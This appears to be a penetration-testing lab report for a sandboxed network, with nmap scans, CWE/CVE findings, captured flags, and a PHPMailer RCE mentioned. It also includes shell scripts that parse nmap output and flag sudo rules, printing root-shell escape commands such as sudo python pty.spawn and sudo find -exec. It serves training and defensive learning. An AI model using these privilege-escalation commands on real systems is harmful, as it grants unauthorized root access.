jasonsett/Pentest

Red Team: Summary of Operations

Table of Contents

  • Exposed Services
  • Critical Vulnerabilities
  • Exploitation

Exposed Services

Nmap was run against every machine in the lab network with service-version detection (-sV); Target 2 was additionally scanned with OS detection (-O). The commands used for each host:

Target 1

$ nmap -sV --version-all 192.168.1.110

Target 2

$ nmap -sV -O 192.168.1.115

ELK Server

$ nmap -sV --version-all 192.168.1.100

Capstone

$ nmap -sV --version-all 192.168.1.105

Kali

$ nmap -sV --version-all 192.168.1.90

NAT Switch

$ nmap -sV --version-all 192.168.1.1

These scans identified the services below as potential points of entry for Targets 1 and 2:

Target 1

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 (Debian)

Target 2

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 (Debian)
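As an added example (not part of this repository), the following POSIX shell script turns nmap's grepable output (nmap ... -oG file) into the kind of per-host service table shown above, keeping only open ports so closed and filtered ones do not get mistaken for entry points. The sample scan text is constructed to mirror the Target 1 and Target 2 results; the filtered port 139 on 192.168.1.115 is invented to show that non-open ports are dropped.

```shell
#!/bin/sh
# Added example: summarise nmap grepable (-oG) output as one line per open port.
# Constructed sample modelled on the Target 1 / Target 2 findings; not real scan output.
# Grepable port entries have the shape port/state/proto/owner/service/rpcinfo/version/
SAMPLE_GNMAP=$(printf '%b\n' \
  'Host: 192.168.1.110 ()\tStatus: Up' \
  'Host: 192.168.1.110 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.10 ((Debian))/\tIgnored State: closed (998)' \
  'Host: 192.168.1.115 ()\tStatus: Up' \
  'Host: 192.168.1.115 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.10 ((Debian))/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)')

open_ports() {
  # $1: grepable nmap text. Emits "host<TAB>port/proto<TAB>service<TAB>version", open ports only.
  printf '%s\n' "$1" | awk -F'\t' '
    /Ports: / {
      split($1, h, " "); host = h[2]                 # "Host: 192.168.1.110 ()" -> address
      for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
      n = split(ports, p, /, /)                      # one entry per port
      for (j = 1; j <= n; j++) {
        split(p[j], f, "/")                          # f[1]=port f[2]=state f[3]=proto f[5]=service f[7]=version
        if (f[2] == "open") printf "%s\t%s/%s\t%s\t%s\n", host, f[1], f[3], f[5], f[7]
      }
    }'
}

hosts_running() {
  # $1: grepable nmap text, $2: service name. Lists the hosts exposing that service.
  open_ports "$1" | awk -F'\t' -v svc="$2" '$3 == svc { print $1 }' | sort -u
}

# Stand-alone run: print the open-port table, then the hosts exposing ssh.
open_ports "$SAMPLE_GNMAP"
hosts_running "$SAMPLE_GNMAP" ssh
```

To use it on real scans, produce the grepable file with `nmap -sV -oG targets.gnmap 192.168.1.110 192.168.1.115` and call `open_ports "$(cat targets.gnmap)"`. The split on ", " relies on nmap's own field layout (it rewrites "/" inside version strings as "|"), so a version string containing a literal ", " would be the one case this simple parser mishandles.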

Critical Vulnerabilities

The following vulnerabilities were identified on Target 1:

  1. Exposure of Information through Directory Listing (CWE-548) -- Severity: Low
  2. Weak Password Requirements (CWE-521) -- Severity: High
  3. Improper Access Control (CWE-284) -- Severity: High
  4. Improper Privilege Management (CWE-269) -- Severity: High

In addition to the vulnerabilities above, these vulnerabilities were exploited on Target 2:

  1. Remote Code Execution (CVE-2016-10033, PHPMailer before 5.2.18) -- Severity: High
  2. Command Injection (CWE-77) -- Severity: High

Exploitation

The Red Team was able to penetrate Target 1 and retrieve the following confidential data:

  • flag1.txt: b9bbcb33e11b80be759c4e844862482d
    • Exploit Used: CWE-548: Exposure of Information through Directory Listing
$ nano /var/www/html/service.html

  • flag2.txt: fc3fd58dcdad9ab23faca6e9a36e581c
    • Exploit Used: CWE-521: Weak Password Requirements
$ cat /var/www/flag2.txt

  • flag3.txt: afc01ab56b50591e7dccf93122770cd2
    • Exploit Used: CWE-284: Improper Access Control
mysql> SELECT * FROM wp_posts;

  • flag4.txt: 715dea6c055b9fe3337544932f2941ce
    • Exploit Used: CWE-269: Improper Privilege Management
$ sudo python -c 'import pty;pty.spawn("/bin/bash")'
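The flag4 step works because a sudo rule let the user run python as root, and an interpreter run under sudo can spawn a root shell. As an added example (not part of this repository), the script below reads `sudo -l` output, flags allowed commands that have a well-known shell escape, and prints the escape to try; it is the check a tester runs before reaching for the command above. The username "someuser" and the three `sudo -l` transcripts are constructed for the example, not taken from the targets, and the list of escapable binaries is hand-picked rather than exhaustive.

```shell
#!/bin/sh
# Added example: find sudo rules that hand out a root shell (the CWE-269 pattern above).
# Constructed sudo -l transcripts; "someuser" and the hosts are placeholders.
SAMPLE_SUDO_L='Matching Defaults entries for someuser on target1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User someuser may run the following commands on target1:
    (ALL) NOPASSWD: /usr/bin/python'

SAMPLE_SUDO_L_MULTI='User someuser may run the following commands on target2:
    (root) NOPASSWD: /usr/bin/perl, /usr/bin/find
    (root) /usr/sbin/service apache2 restart'

SAMPLE_SUDO_L_SAFE='User someuser may run the following commands on target2:
    (root) /usr/sbin/service apache2 restart'

# Hand-picked binaries with a well-known shell escape; extend as needed.
SHELL_ESCAPES='python python2 python3 perl ruby vim vi less more find awk'

sudo_escapes() {
  # $1: text of `sudo -l`. Prints the basename of each allowed command found in
  # SHELL_ESCAPES (or ALL when the rule grants every command), one per line, in rule order.
  printf '%s\n' "$1" | awk -v list="$SHELL_ESCAPES" '
    BEGIN { n = split(list, l, " "); for (i = 1; i <= n; i++) risky[l[i]] = 1 }
    /^User .* may run the following commands/ { inrules = 1; next }
    inrules && /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)          # drop the runas spec "(ALL)" / "(root : root)"
      while (sub(/^[A-Z]+:[ \t]*/, "", line)) { }      # drop tags such as NOPASSWD: / SETENV:
      m = split(line, cmds, /,[ \t]*/)                 # several commands may share one rule
      for (j = 1; j <= m; j++) {
        split(cmds[j], w, " "); path = w[1]            # command path, ignoring fixed arguments
        if (substr(path, 1, 1) == "!") continue        # negated entry, not a grant
        if (path == "ALL") { print "ALL"; continue }
        k = split(path, parts, "/")
        if (parts[k] in risky) print parts[k]
      }
    }'
}

escape_command() {
  # Map a flagged binary to the usual interactive-shell escape for it.
  case "$1" in
    python|python2|python3) printf "sudo %s -c 'import pty;pty.spawn(\"/bin/bash\")'\n" "$1" ;;
    perl)      printf "sudo perl -e 'exec \"/bin/bash\";'\n" ;;
    ruby)      printf "sudo ruby -e 'exec \"/bin/bash\"'\n" ;;
    find)      printf 'sudo find . -exec /bin/bash %s -quit\n' '\;' ;;
    awk)       printf "sudo awk 'BEGIN {system(\"/bin/bash\")}'\n" ;;
    vim|vi)    printf "sudo %s -c ':!/bin/bash'\n" "$1" ;;
    less|more) printf "sudo %s /etc/profile   # then type !/bin/bash at the pager prompt\n" "$1" ;;
    ALL)       printf 'sudo /bin/bash\n' ;;
    *)         printf 'no known escape for %s\n' "$1" ;;
  esac
}

report() {
  # $1: sudo -l text. One line per flagged binary with the escape to try.
  sudo_escapes "$1" | while read -r b; do printf '%s => %s\n' "$b" "$(escape_command "$b")"; done
}

# Stand-alone run over the constructed transcripts.
report "$SAMPLE_SUDO_L"
report "$SAMPLE_SUDO_L_MULTI"
```

On a target, run `report "$(sudo -l 2>/dev/null)"`. The parser handles the common one-line rule layout (runas spec, optional tags, comma-separated commands); rules that sudo wraps across lines or that quote spaces in paths are not covered, so read the raw `sudo -l` output as well before concluding nothing is escapable.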


The team also penetrated Target 2 and retrieved additional confidential data:

  • flag1.txt: a2c1f66d2b8051bd3a5874b5b6e43e21
    • Exploit Used: Remote Code Execution
    • URL: 192.168.1.115/vendor/PATH

  • flag2.txt: 6a8ed560f0b5358ecf844108048eb337
    • Exploit Used: Command Injection
$ cat /var/www/flag2.txt

  • flag3.txt: a0f568aa9de277887f37730d71520d9b
    • Exploit Used: Command Injection
    • URL: 192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png

A more detailed walkthrough of these attacks can be found in Attack/Offensive Presentation.pptx

About

A sandbox environment was configured to monitor a virtual network with a Kali Linux attacking machine and two target machines.
